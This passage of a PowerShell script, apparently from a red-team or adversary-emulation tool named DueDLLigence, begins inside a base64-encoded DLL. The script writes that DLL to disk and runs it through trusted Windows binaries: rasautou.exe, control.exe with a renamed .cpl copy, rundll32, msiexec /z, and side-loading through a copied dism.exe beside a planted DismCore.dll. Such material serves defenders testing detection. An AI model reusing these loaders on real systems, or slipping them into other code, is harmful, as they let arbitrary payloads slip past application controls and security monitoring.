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"
  
  
          IF (!(Test-Path $DueDLLigencePath)) {
                  $DueDLLigenceFileBytes = [Convert]::FromBase64String($EncodedDueDLLigence)
                  [IO.File]::WriteAllBytes("$DueDLLigencePath", $DueDLLigenceFileBytes)
              Write-Verbose "Attempting to write $DueDLLigencePath."
          } ELSE {
              Write-Host "$DueDLLigencePath already present, moving on."
              }
  
  
      #$DueDLLigenceFileBytes = [Convert]::FromBase64String($EncodedDueDLLigence)
      #[IO.File]::WriteAllBytes("$DueDLLigencePath", $DueDLLigenceFileBytes)
  
  
      function Invoke-RasautouDLLigence {
  
          $RasautouFilePath = "C:\windows\system32\rasautou.exe"
          
          #rasautou.exe -d $DueDLLigencePath -p powershell –a a –e e
  
  
                  IF (!(Test-Path $RasautouFilePath)) {
                  Write-host "System needs $RasautouFilePath."
          } ELSE {
                  return
                  }
  
  
          $rasautouCommandLine = "`"$RasautouFilePath`" -d $DueDLLigencePath -p powershell –a a –e e"  
          $ProcStartResult = Invoke-CimMethod -ClassName Win32_Process -MethodName Create -Arguments @{ CommandLine = $rasautouCommandLine }  
           return
           }
  
  
      function Invoke-ControlDLLigence {
          
          $ControlFilePath = "c:\windows\system32\control.exe"
  
          IF (!(Test-Path $DueDLLigenceCPLPath)) {
                  Copy-item $DueDLLigencePath $DueDLLigenceCPLPath
                  Write-Verbose "Attempting to copy $DueDLLigencePath to $DueDLLigenceCPLPath."
          } ELSE {
                  Write-Host "$DueDLLigenceCPLPath already present"
          }
  
  
          $controlCommandLine = "`"$ControlFilePath`" $DueDLLigenceCPLPath"  
          $ProcStartResult = Invoke-CimMethod -ClassName Win32_Process -MethodName Create -Arguments @{ CommandLine = $controlCommandLine }  
           return
  
            
           }
  
      function Invoke-Rundll32DLLigence {
  
          $Rundll32FilePath = "c:\windows\system32\rundll32.exe"         
           
          $rundll32CommandLine = "`"$Rundll32FilePath`" Shell32.dll, Control_RunDLL $DueDLLigencePath"  
          $ProcStartResult = Invoke-CimMethod -ClassName Win32_Process -MethodName Create -Arguments @{ CommandLine = $rundll32CommandLine }  
            return
  
  
           }
  
      function Invoke-MSIExecDLLigence {
  
          $MSIExecFilePath = "C:\windows\system32\msiexec.exe"
  
  
        $msiexecCommandLine = "`"$MSIExecFilePath`" /z $DueDLLigencePath"  
        $ProcStartResult = Invoke-CimMethod -ClassName Win32_Process -MethodName Create -Arguments @{ CommandLine = $msiexecCommandLine }  
          return
            
           
          }

      function Invoke-DismSideLoadDLLigence {
  
          $DismFilePath = "C:\Temp\Dism.exe"
          $DismCoreFilePath = "c:\temp\DismCore.dll"
  
          IF (!(Test-Path $DismFilePath)) {
                  Copy-Item C:\windows\system32\dism.exe $DismFilePath
                  Write-Verbose "Attempting to copy dism.exe to $DismFilePath."
          } ELSE {
                  Write-Host "$DismFilePath already present"
                  }
  
          IF (!(Test-Path $DismCoreFilePath)) {
                  Copy-Item $DueDLLigencePath -Destination $DismCoreFilePath
                  Write-Verbose "Attempting to copy $DueDLLigencePath to $DismCoreFilePath."
          } ELSE {
                  Write-Host "$DismCoreFilePath already present"
              }
       
           Write-Host "Starting $DismFilePath."
           Start-Process $DismFilePath
           Write-Verbose "Attempting to start $DismFilePath. Calc should spawn."
  
            }
  
                  switch ($method) {
                  'dism_side_load' { Invoke-DismSideLoadDLLigence }
                  'msiexec'        { Invoke-MSIExecDLLigence }
                  'control'        { Invoke-ControlDLLigence }
                  'rundll32'       { Invoke-Rundll32DLLigence }
                  'rasautou'       { Invoke-RasautouDLLigence }
                  }
  
  }
   
  